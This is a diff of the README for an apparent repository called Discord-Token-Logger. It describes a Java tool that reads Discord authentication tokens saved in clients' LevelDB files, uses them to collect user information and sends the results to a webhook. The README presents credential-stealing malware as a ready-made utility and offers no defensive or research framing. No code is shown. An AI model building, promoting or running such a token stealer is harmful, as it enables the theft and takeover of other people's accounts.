0x5d0/Discord-Token-Logger/README.md

+Simple Discord token logging utility written in Java.

+# Features
-Simple Discord token logger written in Java.
-Only logs tokens saved by clients in LevelDB files.
-Now with webhook functionality.
+ - Log tokens saved by Discord clients in LevelDB files
+ - Gather user info through the token and send it to a webhook

 # Requirements
   - Java 11+